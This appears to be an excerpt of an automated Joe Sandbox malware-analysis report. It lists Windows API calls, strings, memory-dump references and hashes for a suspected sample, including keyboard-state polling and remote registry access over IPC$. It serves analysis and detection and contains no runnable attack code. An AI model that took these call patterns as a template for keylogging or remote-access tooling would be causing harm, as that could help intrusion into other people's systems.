                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                                  • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                                                                  • String ID: %s%u
                                                                                                                                                                  • API String ID: 1412819556-679674701
                                                                                                                                                                  • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                  • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharDriveLowerType
                                                                                                                                                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                  • API String ID: 2426244813-2127371420
                                                                                                                                                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                                                  • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                  • String ID: 2
                                                                                                                                                                  • API String ID: 1331449709-450215437
                                                                                                                                                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                  • API String ID: 4072794657-2268648507
                                                                                                                                                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                                  APIs
                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                  • API String ID: 3030280669-22481851
                                                                                                                                                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyWindow
                                                                                                                                                                  • String ID: static
                                                                                                                                                                  • API String ID: 3375834691-2160076837
                                                                                                                                                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F04), ref: 004342D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                                  • API String ID: 2907320926-3566645568
                                                                                                                                                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                                                  • DeleteObject.GDI32(00410000), ref: 00470A04
                                                                                                                                                                  • DestroyIcon.USER32(0045004D), ref: 00470A1C
                                                                                                                                                                  • DeleteObject.GDI32(755974B9), ref: 00470A34
                                                                                                                                                                  • DestroyWindow.USER32(033100C0), ref: 00470A4C
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1237572874-0
                                                                                                                                                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
Similarity
• API ID: Directory$CurrentSystem
• String ID: D
• API String ID: 1285235121-2746444292
APIs
• OleInitialize.OLE32(00000000), ref: 0046CBC7
• CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
• CLSIDFromString.OLE32(?,?), ref: 0046CBF1
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• CoTaskMemFree.OLE32(?), ref: 0046CE42
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
Strings
• NULL Pointer assignment, xrefs: 0046CEA6
Similarity
• API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask
• String ID: NULL Pointer assignment
• API String ID: 3724026681-2785691316
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper
• String ID: ThumbnailClass
• API String ID: 3725905772-1241985126
APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                                                                  • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
